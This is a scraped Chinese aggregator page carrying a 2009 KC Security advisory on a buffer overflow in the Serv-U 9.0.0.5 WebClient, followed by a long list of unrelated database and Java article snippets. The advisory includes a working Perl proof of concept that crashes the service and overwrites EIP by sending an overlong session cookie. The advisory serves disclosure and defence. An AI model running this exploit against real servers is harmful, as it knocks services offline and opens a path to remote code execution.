店主刘涛
店主刘涛

oracle cve 2015 4873,CVE-2009-4873 Rhinosoft Serv-U Web客户端HTTP请求远程溢出漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯...

-- KC Security PUBLIC ADVISORY -- http://www.rangos.de --

11-01-2009

RhinoSoft.com Serv-U 9.0.0.5 WebClient Remote Buffer Overflow

Background

------------

Serv-U includes a simple, browser-based transfer client perfect

for every business environment. The Web Client is accessed through

a standard web browser and features an unintimidating, familiar interface.

It is a great way for sharing photos and image files with clients and

co-workers due to its configurable thumbnail view that allows remote

images to be quickly viewed without downloading the entire file.

An additional slideshow view offers a fast way to share a collection

of photos from your latest projects. When using Serv-U, photo sharing

sites and large email attachments are a thing of the past!

Description

------------

Remote exploitation of a buffer overflow in the Serv-U WebClient

may allow attackers to execute arbitrary code.

The problem lies in the handling of overly long Session Cookies.

When a very long session cookie is sent to the Serv-U WebClient

HTTP Service an overrun occurs and EIP becomes "overwritten".

Detection

------------

KC Security confirmed the vulnerability in the latest version of Serv-U

WebClient which is 9.0.0.5.

Workaround

------------

Disable the WebClient Service and use the Serv-U FTP/SFTP components only.

Proof of concept

------------

The following PERL script will crash the Serv-U.exe service and overwrite

EIP with 0xAAAAAAAA.

---snip---

use IO::Socket;

$|=1;

$a = "A" x 100000;

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => '80',

Proto => 'tcp');

print $sock "POST / HTTP/1.1\r\n"

."Host: $ARGV[0]\r\n"

."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8$a\r\n"

."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n"

."Content-Length: 0\r\n\r\n";

while () {

print;

}

---snip---

Credit

------------

This vulnerability was discovered by Nikolaos Rangos of KC Security.

Visit us at http://www.rangos.de

你可能感兴趣的:(oracle,cve,2015,4873)

  • SQL运维_Unix下MySQL-8.0.18配置文件示例 Mostcow SQLsql运维unix
    SQL运维_Unix下MySQL-8.0.18配置文件示例MySQL是一个关系型数据库管理系统,由瑞典MySQLAB公司开发,属于Oracle旗下产品。MySQL是最流行的关系型数据库管理系统之一,在WEB应用方面,MySQL是最好的RDBMS(RelationalDatabaseManagementSystem,关系数据库管理系统)应用软件之一。MySQL是一种关系型数据库管理系统,关系数据库将
  • 福建科立讯通信 指挥调度管理平台 SQL注入漏洞复现(CVE-2024-2620、CVE-2024-2621) OidBoy_G 漏洞复现安全web安全
    0x01产品简介福建科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。0x02漏洞概述福建科立讯通信指挥调度管理平台down_fil
  • WordPress Plugin NotificationX插件 SQL注入漏洞复现(CVE-2024-1698) OidBoy_G 漏洞复现sqlweb安全安全
    0x01产品简介WordPress和WordPressplugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。0x02漏洞概述WordPresspluginNotificationX是一个应用插件。2.8.2版本及之前存在安全漏洞,该漏洞源于对用户提供的参数转义不充分以及对现有SQL查询缺乏充分
  • MySQL Enterprise Backup (MEB) for MySQL 8.0 深入解析及企业级备份恢复演练 lzyever MySQLmysql数据库
    一、备份恢复核心概念MEB简介MySQLEnterpriseBackup是Oracle提供的专业物理备份工具,专为MySQL8.0及以后版本设计,提供高效且低干扰的在线备份解决方案。它能够实现对InnoDB存储引擎数据的快速备份,并兼容MySQL的诸多高级特性。主要特点在线热备份:MEB在备份期间尽可能减少对数据库活动的阻塞,采用多线程技术并结合InnoDB的元组锁定机制,创建一致性备份。增量备份
  • docker构建镜像命令 你是理想 dockerdocker容器运维
    编写dockerfile文件例子1;FROMoraclelinux:7-slimENVrelease=19ENVupdate=13RUNcurl-o/etc/yum.repos.d/public-yum-ol7.repohttps://yum.oracle.com/public-yum-ol7.repo&&\yum-config-manager--enableol7_oracle_instantc
  • Oracle 物化视图 博弈星宇 Oracleoracle数据库database
    物化视图也是种视图。Oracle的物化视图是包括一个查询结果的数据库对像,它是远程数据的本地副本,或者用来生成基于数据表求和的汇总表。物化视图存储基于远程表的数据,也可以称为快照。物化视图可以查询表,视图和其它的物化视图。特点:(1)物化视图在某种意义上说就是一个物理表(而且不仅仅是一个物理表),这通过其可以被user_tables查询出来,而得到确认;(2)物化视图也是一种段(segment),
  • 软通动力华为java机考题库_软通动力Java考试题库.doc 假行酥 软通动力华为java机考题库
    软通动力Java考试题库.doc软通动力培训课程题库Java编号:ISS-TJ-TC版本:1.0作者:JavaSE基础康佳琪日期作者:JavaEE高级张建军日期:审批人:张林福日期:目录JavaSE基础部分Java基础Java面向对象Java异常Java集合框架J2EE中,下列不属于集合类的是()。(选择一项)CVectorStackEnumerationHashtable2)在J2EE中,下列元
  • 唯一约束 橙子味冰可乐 Oracle从小白到总裁数据库oraclesql开发语言java
    Oracle从入门到总裁:https://blog.csdn.net/weixin_67859959/article/details/135209645唯一约束唯一约束的特点是在某一个列上的内容不允许出现重复。例如,现在要收集用户的信息,假设包含编号(mid)、姓名(name)、E-mail(email)很明显email的数据不可能重复,所以就可以使用unique约束完成--删除数据表dropta
  • JDBC的概念 2301_79744036 数据库java
    一.JDBC概念:其实JDBC就像是翻译官,就像是你去到国外是不是听不懂当地人再讲什么?Java就相当于是你,数据库就是本地人,然后JDBC就是那个翻译官,它提供了一套标准的方法和工具,让Java程序可以与各种不同类型的数据库进行交流,无论是MySQL、Oracle、SQLServer还是其他类型的数据库。它隐藏了与具体数据库相关的细节,使得Java程序员可以用相同的方式来访问不同的数据库,而不需
  • 如何用Jmeter对数据库执行压力测试 自动化测试薰儿 软件测试技术分享jmeter数据库压力测试
    在我看来压力测试的压测对象可以分为UI,接口及数据库三个部分吧,对界面及接口进行压测还算熟悉,定位性能瓶颈,对数据库SQL执行压测也是需要做的。工具呢?还是Jmeter1、将需要用到的链接Oracle的架包放到jmeter中在数据库服务器安装路径下,找到ojdbc5.jar,D:\app\Administrator\product\11.2.0\dbhome_1\jdbc\lib拷贝到jmeter
  • Hibernate的Criteria查询因某个字段为空,导致查询数据为空问题 clk_esunny 随笔javahibernatejava查询
    今天,使用Hibernate的Criteria查询Oracle数据库表数据,发现只要表里面某个字段为空,查询不出来数据,这是为什么呢?下面解决方法介绍一下:(下面的表User_Info,只是举例说明使用)一、查找原因,排除法(1)是不是这个Criteria查询方法不支持?a.采用普通的Hibernate查询QueryqyeryObj=session.createQuery("FROMUSER_IN
  • Oracle数据库体系结构简介 腾科教育 oracleoracle数据库
    Oracle数据库是一种功能强大且广泛使用的关系数据库管理系统(RDBMS)。为了更好地理解和使用Oracle数据库,了解其体系结构是至关重要的。本文将简要介绍Oracle数据库的体系结构,以便读者能够对其工作原理有一个基本的了解。一、实例(Instance)和数据库(Database):Oracle数据库由两个主要组成部分组成:实例和数据库。实例是在计算机内存中运行的Oracle进程集合,负责管
  • oracle底层原理 编织幻境的妖 oracle数据库
    1.请解释Oracle数据库的体系结构,包括实例和数据库之间的关系。Oracle数据库的体系结构可以分为内存结构、进程结构和存储结构三个主要部分,其中实例和数据库是两个核心概念。具体分析如下:内存结构:主要由两部分组成,SGA(系统全局区)和PGA(进程全局区)。SGA是一组共享的内存结构,包含数据库缓存、共享池等,用于提高数据库的性能和效率。PGA是非共享的内存区域,每个服务器进程都有自己的PG
  • SinoDB V16.8 版本新特性 Sinoregal SinoDB数据库国产数据库
    1、Oracle兼容兼容withas语法兼容insertall/first语法兼容(+)形式的左外连接和右外连接语法兼容ROLLUP/CUBE/GROUPINGSETS语法兼容createorreplaceview/trigger/procedure/function/index语法兼容renameprocedure/function语法2、新增功能条件索引(ConditionalIndex)新增
  • DataX-数据迁移Oracle到Mysql-ETL工具 天海行者 【数据库】etl数据仓库
    一、安装https://github.com/WeiYe-Jing/datax-web/blob/master/doc/datax-web/datax-web-deploy.md1、直接下载DataX工具包:DataX下载地址下载后解压至本地某个目录,进入bin目录,即可运行同步作业:$cd{YOUR_DATAX_HOME}/bin$pythondatax.py{YOUR_JOB.json}自检脚
  • Oracle将归档日志从 ASM 拷贝到 Linux 文件系统中操作步骤 冥净 oraclelinux数据库
    Oracle–将归档日志从ASM拷贝到Linux文件系统中操作步骤适用场景:备份出现问题,ASM中归档日志磁盘组空间不足,暂时无法扩容,数据库不可用。操作前提:可以备份情况下,先备份之后直接清理日志文件。如果没法第一时间备份情况下,先将数据库文件拷贝到本地,先将asm中日志文件清理,恢复数据库业务使用,之后再将本地拷贝出来的日志文件,重新拷贝回asm磁盘组中,再进行备份检查事项:执行后需要校验归档
  • Oracle数据库 guwei666666 Oracle数据库oracle
    1.数据库简介1.1什么是数据库简单的说,数据库(database)就是一个存放数据的仓库,这个仓库是按照一定的数据结构(数据结构是指数据的组织形式或数据之间的联系)来组织、存储的,我们可以通过数据提供的多种方法来管理数据库里的数据。当人们收集了大量的数据后,应该把它们保存起来进入近一步的处理,进一步的抽取有用的信息。当年人们把数据存放在文件柜中,可现在随着社会的发展,数据量急剧增长,现在人们就借
  • Spark从入门到精通29:Spark SQL:工作原理剖析以及性能优化 勇于自信
    SparkSQL工作原理剖析1.编写SQL语句只要是在数据库类型的技术里面,例如MySQL、Oracle等,包括现在大数据领域的数据仓库,例如Hive。它的基本的SQL执行的模型,都是类似的,首先都是要生成一条SQL语句执行计划。执行计划即从哪里查询,在哪个文件,从文件中查询哪些数据,此外,复杂的SQL还包括查询时是否对表中的数据进行过滤和筛选等等。2.UnresolvedLogicalPlan未
  • Oracle存储过程干货(一):存储过程基础 ZzzkiYoumi oracle日常运维笔记oracle数据库dba运维
    /SQLplus中,设置setserveroutputon才能显示输出结果/—匿名的PLSQL(存储过程)块,不存储在数据库中beginnull;end;/begindbms_output.put('hi');/*put是不换行的输出*/dbms_output.put_line('helloworld');/*put_line是换行的输出*/end;/—命名的存储过程,存储在数据库中createo
  • 实战:从Oracle standby数据库端备份数据库并在异机恢复一个新的数据库 lzyever Oracle数据库oracle
    导读为减少主库的备份压力,在standby备库备份数据库,由于测试需要,现在在异机恢复一个数据库的测试环境,即利用standby数据库的备份恢复一个新的数据库。1、查看standby数据库备份脚本#!/bin/sh.~/.bash_profileDATE=`date+%Y-%m-%d-%H-%M-%S`exportORACLE_SID=ORCLADGrmantarget/log=/backup/l
  • oracle job 创建 删除 更改状态 启动 停止 chaoloveyou oracle数据库java
    创建declarejobnamenumber;beginsys.dbms_job.submit(ccb_job,--job名称'imp_ccb(''1'',''2'',''3'');',--预警信息、指令信息、综合统计的存储过程sysdate,--job启动后下次执行时间'trunc(sysdate,''mi'')+1/(24*60)');--每分钟执行一次commit;end;查看select*
  • OpenSSL 安全漏洞(CVE-2023-3817) 鹊鹊_Y 漏洞修复ssl服务器运维linux
    厂商补丁:目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://www.openssl.org/news/secadv/20230731.txtOpenSSL安全建议[2023年7月31日]==========================================检查DHq参数值花费过多时间(CVE-2023-3817)=============================
  • Oracle Rac lock进程,Oracle RAC后台进程介绍 weixin_39965102 OracleRaclock进程
    在OracleRAC数据库上会比单实例数据库多一些进程,这些进程是RAC特有的,为了实现集群数据库功能而设置的。这篇文章会对RAC特有的进程做一些介绍。1、LMSn:GlobalCacheServiceProcess。LMSn进程会维护在GlobalResourceDirectory(GRD)中的数据文件以及每个cachedblock的状态。LMSn用于在RAC的实例间进行message以及数据块
  • 搭建oracleRAC详解(裸设备) weixin_34270865 数据库开发工具运维
    为什么80%的码农都做不了架构师?>>>理清思路先设备,一个笔记本,两台redhat5的虚拟机(32bit),两个虚拟机都安装过oracle,配置好一些安装的必要条件了,需要的包官网下。1。选择2台主机,同平台的,保证网络互通2。设计和配置ip地址,每台主机3个ip,配置2个,预留一个私有IP:在独立的网段,双机内部通信10.10.10.1公有IP:维护的IP,在工作网段192.168.1.11虚
  • mysql 中的一些重要函数 一切顺势而行 mysql数据库
    showcreatetableuser_profile查看表结构1.datediff(end_date,start_date)函数,now(),curdate()curtime()date_add(日期,intervalnum时间)date_format(日期,格式)4.selectIFNULL(null,0);oracle中nvl函数5.selectIF(2>1,2,0),oracle中deco
  • 【Supra空投指南】 awsless web3区块链
    一、简介单号注册并完成kyc最低送490个代币(价值200u左右,可多号操作),每周都有任务(非常简单,不花时间),随完成任务增多可获得更多空投,3-4月份空投!!二、操作步骤Supraoracles:Supra是一种创新的跨链预言机和“无桥”通信网络,目前融资金额高达2400万美金。融资机构包括:Animoca、CoinbaseVentures、HashKey、ProsusVentures、Ra
  • 快速搭建项目运行环境(JDK+Maven+Git+Docker+Mysql+Redis+Node.js+Nginx)+前后端项目分别部署 A尘埃 javamavengit
    JDK①、从oracle官方网站上下载1.8版本中的最新版的JDKhttps://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html②、把文件通过WinSCP或者XFTP上传到服务器上③、解压和配置环境变量#进入安装包目录,解压cd/data/tmptar-zxvfjdk-8u261-linux-x64.tar.gz
  • oracle 数据库连接错误:ORA-12154,ORA-12523 _*大米*_ oracle数据库连接
    起由:在本机启动两个数据库,orcl和HIS,在服务端连接没有问题。采用客户端模式连接时,在PL/SQL连接数据库时,经常会报以下两个错误。ORA-12154:TNS:couldnotresolvetheconnectidentifierspecifiedORA-12523:TNS:listenercouldnotfindinstanceappropriatefortheclientconnect
  • 实战:如何将Oracle单实例数据库转换成Oracle RAC数据库 lzyever Oracleoracle
    导读本文介绍如何将Oracle单实例数据库转换成OracleRAC数据库环境说明:数据库节点2上有个单实例数据库zlxdb2,现在要将zlxdb2转换成RAC数据库,RAC数据库的两个实例分别是lzydb1和lzydb2。以下是详细的操作步骤:1、查看zlxdb2的默认undo表空间SYS@zlxdb2>showparameterundoNAMETYPEVALUE-----------------
  • oracle使用正则表达式REGEXP_SUBSTR提取XML里面的内容 qq_39255840 oracle正则表达式xml
    使用extract(XMLTYPE(XML),‘xphat’).getstringval()提取XML,长度过长存在报错ORA-06502:PL/SQL:数字或值错误:characterstringbuffertoosmallORA-06512:在“SYS.XMLTYPE”,line169并且存在速度较慢等问题。正则提取XML,由于这边的XML文本中Name标签,接着的标签即为Value的值,故这
  • eclipse maven IXHONG eclipse
    eclipse中使用maven插件的时候,运行run as maven build的时候报错 -Dmaven.multiModuleProjectDirectory system propery is not set. Check $M2_HOME environment variable and mvn script match.   可以设一个环境变量M2_HOME指
  • timer cancel方法的一个小实例 alleni123 多线程timer
    package com.lj.timer; import java.util.Date; import java.util.Timer; import java.util.TimerTask; public class MyTimer extends TimerTask { private int a; private Timer timer; pub
  • MySQL数据库在Linux下的安装 ducklsl mysql
    1.建好一个专门放置MySQL的目录 /mysql/db数据库目录 /mysql/data数据库数据文件目录 2.配置用户,添加专门的MySQL管理用户 >groupadd mysql ----添加用户组 >useradd -g mysql mysql ----在mysql用户组中添加一个mysql用户 3.配置,生成并安装MySQL >cmake -D
  • spring------>>cvc-elt.1: Cannot find the declaration of element Array_06 springbean
    将-------- <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans"     xmlns:xsi="http://www.w3
  • maven发布第三方jar的一些问题 cugfy maven
    maven中发布 第三方jar到nexus仓库使用的是 deploy:deploy-file命令 有许多参数,具体可查看 http://maven.apache.org/plugins/maven-deploy-plugin/deploy-file-mojo.html 以下是一个例子: mvn  deploy:deploy-file -DgroupId=xpp3
  • MYSQL下载及安装 357029540 mysql
        好久没有去安装过MYSQL,今天自己在安装完MYSQL过后用navicat for mysql去厕测试链接的时候出现了10061的问题,因为的的MYSQL是最新版本为5.6.24,所以下载的文件夹里没有my.ini文件,所以在网上找了很多方法还是没有找到怎么解决问题,最后看到了一篇百度经验里有这个的介绍,按照其步骤也完成了安装,在这里给大家分享下这个链接的地址
  • ios TableView cell的布局 张亚雄 tableview
      cell.imageView.image = [UIImage imageNamed:[imageArray objectAtIndex:[indexPath row]]];           CGSize itemSize = CGSizeMake(60, 50);   &nbs
  • Java编码转义 adminjun java编码转义
    import java.io.UnsupportedEncodingException; /** * 转换字符串的编码 */ public class ChangeCharset { /** 7位ASCII字符,也叫作ISO646-US、Unicode字符集的基本拉丁块 */ public static final Strin
  • Tomcat 配置和spring aijuans spring
    简介 Tomcat启动时,先找系统变量CATALINA_BASE,如果没有,则找CATALINA_HOME。然后找这个变量所指的目录下的conf文件夹,从中读取配置文件。最重要的配置文件:server.xml 。要配置tomcat,基本上了解server.xml,context.xml和web.xml。 Server.xml --  tomcat主
  • Java打印当前目录下的所有子目录和文件 ayaoxinchao 递归File
    其实这个没啥技术含量,大湿们不要操笑哦,只是做一个简单的记录,简单用了一下递归算法。   import java.io.File; /** * @author Perlin * @date 2014-6-30 */ public class PrintDirectory { public static void printDirectory(File f
  • linux安装mysql出现libs报冲突解决 BigBird2012 linux
    linux安装mysql出现libs报冲突解决 安装mysql出现 file /usr/share/mysql/ukrainian/errmsg.sys from install of MySQL-server-5.5.33-1.linux2.6.i386 conflicts with file from package mysql-libs-5.1.61-4.el6.i686  
  • jedis连接池使用实例 bijian1013 redisjedis连接池jedis
    实例代码: package com.bijian.study; import java.util.ArrayList; import java.util.List; import redis.clients.jedis.Jedis; import redis.clients.jedis.JedisPool; import redis.clients.jedis.JedisPoo
  • 关于朋友 bingyingao 朋友兴趣爱好维持
      成为朋友的必要条件:    志相同,道不合,可以成为朋友。譬如马云、周星驰一个是商人,一个是影星,可谓道不同,但都很有梦想,都要在各自领域里做到最好,当他们遇到一起,互相欣赏,可以畅谈两个小时。     志不同,道相合,也可以成为朋友。譬如有时候看到两个一个成绩很好每次考试争做第一,一个成绩很差的同学是好朋友。他们志向不相同,但他
  • 【Spark七十九】Spark RDD API一 bit1129 spark
    aggregate package spark.examples.rddapi import org.apache.spark.{SparkConf, SparkContext} //测试RDD的aggregate方法 object AggregateTest { def main(args: Array[String]) { val conf = new Spar
  • ktap 0.1 released bookjovi kerneltracing
    Dear, I'm pleased to announce that ktap release v0.1, this is the first official release of ktap project, it is expected that this release is not fully functional or very stable and we welcome bu
  • 能保存Properties文件注释的Properties工具类 BrokenDreams properties
            今天遇到一个小需求:由于java.util.Properties读取属性文件时会忽略注释,当写回去的时候,注释都没了。恰好一个项目中的配置文件会在部署后被某个Java程序修改一下,但修改了之后注释全没了,可能会给以后的参数调整带来困难。所以要解决这个问题。     &nb
  • 读《研磨设计模式》-代码笔记-外观模式-Facade bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /* * 百度百科的定义: * Facade(外观)模式为子系统中的各类(或结构与方法)提供一个简明一致的界面, * 隐藏子系统的复杂性,使子系统更加容易使用。他是为子系统中的一组接口所提供的一个一致的界面 * * 可简单地
  • After Effects教程收集 cherishLC After Effects
    1、中文入门 http://study.163.com/course/courseMain.htm?courseId=730009 2、videocopilot英文入门教程(中文字幕) http://www.youku.com/playlist_show/id_17893193.html 英文原址: http://www.videocopilot.net/basic/ 素
  • Linux Apache 安装过程 crabdave apache
    Linux Apache 安装过程   下载新版本: apr-1.4.2.tar.gz(下载网站:http://apr.apache.org/download.cgi) apr-util-1.3.9.tar.gz(下载网站:http://apr.apache.org/download.cgi) httpd-2.2.15.tar.gz(下载网站:http://httpd.apac
  • Shell学习 之 变量赋值和引用 daizj shell变量引用赋值
    本文转自:http://www.cnblogs.com/papam/articles/1548679.html Shell编程中,使用变量无需事先声明,同时变量名的命名须遵循如下规则: 首个字符必须为字母(a-z,A-Z) 中间不能有空格,可以使用下划线(_) 不能使用标点符号 不能使用bash里的关键字(可用help命令查看保留关键字) 需要给变量赋值时,可以这么写:
  • Java SE 第一讲(Java SE入门、JDK的下载与安装、第一个Java程序、Java程序的编译与执行) dcj3sjt126com javajdk
    Java SE 第一讲: Java SE:Java Standard Edition Java ME: Java Mobile Edition Java EE:Java Enterprise Edition Java是由Sun公司推出的(今年初被Oracle公司收购)。 收购价格:74亿美金 J2SE、J2ME、J2EE JDK:Java Development
  • YII给用户登录加上验证码 dcj3sjt126com yii
    1、在SiteController中添加如下代码: /** * Declares class-based actions. */ public function actions() { return array( // captcha action renders the CAPTCHA image displ
  • Lucene使用说明 dyy_gusi Lucenesearch分词器
    Lucene使用说明 1、lucene简介 1.1、什么是lucene     Lucene是一个全文搜索框架,而不是应用产品。因此它并不像baidu或者googleDesktop那种拿来就能用,它只是提供了一种工具让你能实现这些产品和功能。 1.2、lucene能做什么     要回答这个问题,先要了解lucene的本质。实际
  • 学习编程并不难,做到以下几点即可! gcq511120594 数据结构编程算法
    不论你是想自己设计游戏,还是开发iPhone或安卓手机上的应用,还是仅仅为了娱乐,学习编程语言都是一条必经之路。编程语言种类繁多,用途各 异,然而一旦掌握其中之一,其他的也就迎刃而解。作为初学者,你可能要先从Java或HTML开始学,一旦掌握了一门编程语言,你就发挥无穷的想象,开发 各种神奇的软件啦。 1、确定目标 学习编程语言既充满乐趣,又充满挑战。有些花费多年时间学习一门编程语言的大学生到
  • Java面试十问之三:Java与C++内存回收机制的差别 HNUlanwei javaC++finalize()堆栈内存回收
    大家知道, Java 除了那 8 种基本类型以外,其他都是对象类型(又称为引用类型)的数据。 JVM 会把程序创建的对象存放在堆空间中,那什么又是堆空间呢?其实,堆( Heap)是一个运行时的数据存储区,从它可以分配大小各异的空间。一般,运行时的数据存储区有堆( Heap)和堆栈( Stack),所以要先看它们里面可以分配哪些类型的对象实体,然后才知道如何均衡使用这两种存储区。一般来说,栈中存放的
  • 第二章 Nginx+Lua开发入门 jinnianshilongnian nginxlua
    Nginx入门 本文目的是学习Nginx+Lua开发,对于Nginx基本知识可以参考如下文章: nginx启动、关闭、重启 http://www.cnblogs.com/derekchen/archive/2011/02/17/1957209.html agentzh 的 Nginx 教程 http://openresty.org/download/agentzh-nginx-tutor
  • MongoDB windows安装 基本命令 liyonghui160com
      windows安装    安装目录:   D:\MongoDB\   新建目录   D:\MongoDB\data\db   4.启动进城:   cd D:\MongoDB\bin   mongod -dbpath D:\MongoDB\data\db   &n
  • Linux下通过源码编译安装程序 pda158 linux
    一、程序的组成部分   Linux下程序大都是由以下几部分组成:   二进制文件:也就是可以运行的程序文件   库文件:就是通常我们见到的lib目录下的文件   配置文件:这个不必多说,都知道   帮助文档:通常是我们在linux下用man命令查看的命令的文档    二、linux下程序的存放目录   linux程序的存放目录大致有三个地方:   /etc, /b
  • WEB开发编程的职业生涯4个阶段 shw3588 编程Web工作生活
    觉得自己什么都会 2007年从学校毕业,凭借自己原创的ASP毕业设计,以为自己很厉害似的,信心满满去东莞找工作,找面试成功率确实很高,只是工资不高,但依旧无法磨灭那过分的自信,那时候什么考勤系统、什么OA系统、什么ERP,什么都觉得有信心,这样的生涯大概持续了约一年。 根本不是自己想的那样 2008年开始接触很多工作相关的东西,发现太多东西自己根本不会,都需要去学,不管是asp还是js,
  • 遭遇jsonp同域下变作post请求的坑 vb2005xu jsonp同域post
    今天迁移一个站点时遇到一个坑爹问题,同一个jsonp接口在跨域时都能调用成功,但是在同域下调用虽然成功,但是数据却有问题. 此处贴出我的后端代码片段 $mi_id = htmlspecialchars(trim($_GET['mi_id '])); $mi_cv = htmlspecialchars(trim($_GET['mi_cv ']));  贴出我前端代码片段: $.aj
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他